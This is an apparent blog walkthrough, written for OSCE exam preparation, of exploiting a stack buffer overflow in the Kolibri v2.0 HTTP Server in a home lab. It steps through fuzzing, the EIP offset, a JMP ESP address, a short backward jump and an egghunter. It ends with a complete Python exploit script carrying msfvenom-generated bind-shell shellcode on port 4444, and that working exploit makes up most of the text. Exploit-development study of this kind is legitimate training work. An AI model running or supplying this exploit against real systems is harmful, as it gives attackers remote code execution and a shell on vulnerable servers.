Exploit Development : Kolibri v2.0 HTTP Server with EggHunter

Chenny Ren
5 min readNov 5, 2020

I decide to write and publish a series of exercises walkthrough while I’m preparing for the OSCE exam. These exercises will heavily focus on exploit development

Exercises Reference : fuzzysecurity http://fuzzysecurity.com/tutorials/expDev/4.html

Kali Linux : 10.0.2.15

Windows XP Pro Sp3 running Kolibri v2.0 HTTP Server : 10.0.2.7

The list of badcharacters : “\x00\x0d\x0a\x3d\x20\x3f”

Run the Kolibri v2.0 HTTP Server on win XP (the debugging machine)

The HTTP server is running on port 8080

Attach the Kolibri to Immunity debugger while running

Let’s create our initial python script to replicate the crash on Kali machine

Send 600 “A”s to the victim machine using HEAP HTTP method

EIP register is overwritten with “\x41”, the letter A in hex decimal.

Follow ESP in dump we can see the buffer

Use pattern_create.rb and pattern_offset.rb to find out how many “A”s we need to reach EIP

replace the pattern we created with “A”s in the script and run again

We see the EIP is overwritten by 32724131

Which means we need 515 “A”s to reach EIP

Modify the script to verify this and we clearly see the EIP is overwritten by exact four “B”s

Let’s find an address that can redirect execution flow to ESP

!mona jpm -r esp

“JMP ESP” found at 0x71A91C8B of wshtcpip.dll.

update the address (reverse order)

After redirecting our flow with “JMP ESP”, we only had little space to work. Although we have only 2 bytes to be used (C = \x43), there are some good space up where some of our initial “A”s

What we do is jumping up a few bytes back to have some more space to work. One simple Assembly code for so is “\xEB\x??”, where “\xEB” corresponds to the jump and “\x??” to the number of bytes to go back. If we choose 50 bytes to go back, let’s use calc.exe to help us with this math:

the hex is /xCE

/xEB/xCE

Now we have 50 bytes to use , generate a 32 bytes Egg Hunter using mona script with the egg value of “b33f”

Add our shellcode on stage 2 , generate with msfvenom

msfvenom -a x86 — platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed

Final step : getting a shell

Set up a net cat listener on our local kali machine , listening on port 4444, execute the python script and we see we got a connect to the victim machine

Done!

Exploit Scripts

#!/usr/bin/python

#

# Author : Chenny Ren

# Exploiting Kolibri HTTP Server (EggHunter)

#

#

import socket

import os

import sys

# jmp esp found at 0x71a91c8b wshtcpip.dll

# Short jmp 50 bytes back opcode: \xEB\xCE

# 32 bytes Egghunter b33f

egghunter = (

“\x66\x81\xca\xff”

“\x0f\x42\x52\x6a”

“\x02\x58\xcd\x2e”

“\x3c\x05\x5a\x74”

“\xef\xb8\x62\x33” #b3

“\x33\x66\x8b\xfa” #3f

“\xaf\x75\xea\xaf”

“\x75\xe7\xff\xe7”)

shellcode = “”

shellcode += “\xd9\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49”

shellcode += “\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37”

shellcode += “\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41”

shellcode += “\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58”

shellcode += “\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x38\x68\x6b\x32”

shellcode += “\x73\x30\x37\x70\x65\x50\x51\x70\x6e\x69\x6a\x45\x70”

shellcode += “\x31\x4b\x70\x75\x34\x4e\x6b\x62\x70\x50\x30\x6c\x4b”

shellcode += “\x36\x32\x34\x4c\x4e\x6b\x31\x42\x35\x44\x4c\x4b\x52”

shellcode += “\x52\x65\x78\x46\x6f\x6d\x67\x31\x5a\x35\x76\x66\x51”

shellcode += “\x39\x6f\x6c\x6c\x67\x4c\x45\x31\x73\x4c\x44\x42\x66”

shellcode += “\x4c\x47\x50\x79\x51\x5a\x6f\x34\x4d\x33\x31\x58\x47”

shellcode += “\x68\x62\x38\x72\x70\x52\x52\x77\x4c\x4b\x53\x62\x36”

shellcode += “\x70\x6c\x4b\x53\x7a\x45\x6c\x6e\x6b\x62\x6c\x66\x71”

shellcode += “\x50\x78\x68\x63\x43\x78\x46\x61\x6e\x31\x52\x71\x4e”

shellcode += “\x6b\x56\x39\x65\x70\x45\x51\x59\x43\x6e\x6b\x43\x79”

shellcode += “\x75\x48\x7a\x43\x67\x4a\x51\x59\x4e\x6b\x37\x44\x6e”

shellcode += “\x6b\x76\x61\x49\x46\x66\x51\x39\x6f\x6e\x4c\x6f\x31”

shellcode += “\x5a\x6f\x36\x6d\x73\x31\x6a\x67\x67\x48\x79\x70\x51”

shellcode += “\x65\x59\x66\x36\x63\x63\x4d\x6a\x58\x47\x4b\x71\x6d”

shellcode += “\x34\x64\x51\x65\x59\x74\x76\x38\x4e\x6b\x42\x78\x31”

shellcode += “\x34\x35\x51\x49\x43\x51\x76\x6e\x6b\x34\x4c\x70\x4b”

shellcode += “\x6e\x6b\x43\x68\x55\x4c\x76\x61\x79\x43\x4e\x6b\x35”

shellcode += “\x54\x4c\x4b\x35\x51\x4a\x70\x6c\x49\x43\x74\x56\x44”

shellcode += “\x46\x44\x33\x6b\x63\x6b\x73\x51\x51\x49\x63\x6a\x42”

shellcode += “\x71\x79\x6f\x79\x70\x53\x6f\x43\x6f\x43\x6a\x4c\x4b”

shellcode += “\x32\x32\x4a\x4b\x4e\x6d\x71\x4d\x61\x78\x57\x43\x77”

shellcode += “\x42\x47\x70\x47\x70\x63\x58\x31\x67\x50\x73\x76\x52”

shellcode += “\x73\x6f\x31\x44\x42\x48\x70\x4c\x53\x47\x67\x56\x36”

shellcode += “\x67\x79\x6f\x6b\x65\x6c\x78\x4c\x50\x65\x51\x73\x30”

shellcode += “\x55\x50\x75\x79\x79\x54\x30\x54\x46\x30\x61\x78\x45”

shellcode += “\x79\x4d\x50\x42\x4b\x45\x50\x4b\x4f\x69\x45\x73\x5a”

shellcode += “\x64\x48\x73\x69\x32\x70\x38\x62\x39\x6d\x73\x70\x76”

shellcode += “\x30\x37\x30\x76\x30\x70\x68\x38\x6a\x64\x4f\x79\x4f”

shellcode += “\x79\x70\x79\x6f\x68\x55\x5a\x37\x45\x38\x63\x32\x47”

shellcode += “\x70\x74\x51\x43\x6c\x4f\x79\x79\x76\x53\x5a\x62\x30”

shellcode += “\x36\x36\x43\x67\x53\x58\x68\x42\x49\x4b\x77\x47\x43”

shellcode += “\x57\x4b\x4f\x39\x45\x71\x47\x30\x68\x48\x37\x4b\x59”

shellcode += “\x50\x38\x79\x6f\x4b\x4f\x59\x45\x53\x67\x52\x48\x31”

shellcode += “\x64\x38\x6c\x67\x4b\x38\x61\x4b\x4f\x4b\x65\x43\x67”

shellcode += “\x6f\x67\x71\x78\x63\x45\x32\x4e\x32\x6d\x63\x51\x79”

shellcode += “\x6f\x5a\x75\x55\x38\x32\x43\x42\x4d\x43\x54\x75\x50”

shellcode += “\x6b\x39\x69\x73\x73\x67\x56\x37\x46\x37\x66\x51\x58”

shellcode += “\x76\x63\x5a\x46\x72\x76\x39\x33\x66\x39\x72\x4b\x4d”

shellcode += “\x30\x66\x78\x47\x50\x44\x56\x44\x75\x6c\x65\x51\x36”

shellcode += “\x61\x4e\x6d\x62\x64\x61\x34\x74\x50\x39\x56\x65\x50”

shellcode += “\x31\x54\x73\x64\x66\x30\x52\x76\x62\x76\x30\x56\x51”

shellcode += “\x56\x76\x36\x52\x6e\x32\x76\x66\x36\x31\x43\x63\x66”

shellcode += “\x42\x48\x32\x59\x48\x4c\x35\x6f\x6e\x66\x79\x6f\x58”

shellcode += “\x55\x6c\x49\x69\x70\x30\x4e\x56\x36\x61\x56\x4b\x4f”

shellcode += “\x36\x50\x62\x48\x54\x48\x4f\x77\x45\x4d\x35\x30\x79”

shellcode += “\x6f\x78\x55\x6f\x4b\x6c\x30\x6d\x65\x4c\x62\x71\x46”

shellcode += “\x61\x78\x4f\x56\x4e\x75\x4d\x6d\x6f\x6d\x79\x6f\x6b”

shellcode += “\x65\x67\x4c\x47\x76\x73\x4c\x54\x4a\x4d\x50\x4b\x4b”

shellcode += “\x4b\x50\x53\x45\x64\x45\x6d\x6b\x32\x67\x56\x73\x42”

shellcode += “\x52\x72\x4f\x72\x4a\x55\x50\x46\x33\x59\x6f\x79\x45”

shellcode += “\x41\x41”

Stage1 = “A” * 478 + egghunter + “A” * 5 + “\x8B\x1C\xA9\x71” + “\xEB\xCE”

Stage2 = “b33fb33f” + shellcode

buffer = (

“HEAD /” + Stage1 + “ HTTP/1.1\r\n”

“Host: 10.0.2.7:8080\r\n”

“User-Agent: “ + Stage2 + “\r\n”

“Keep-Alive: 115\r\n”

“Connection: keep-alive\r\n\r\n”)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

expl.connect((“10.0.2.7”, 8080))

expl.send(buffer)

expl.close()

--

--

Chenny Ren

OSCP | OSWP | OSEP | CRTP |CRTE | CRTO | Red Team Professional | SOC engineer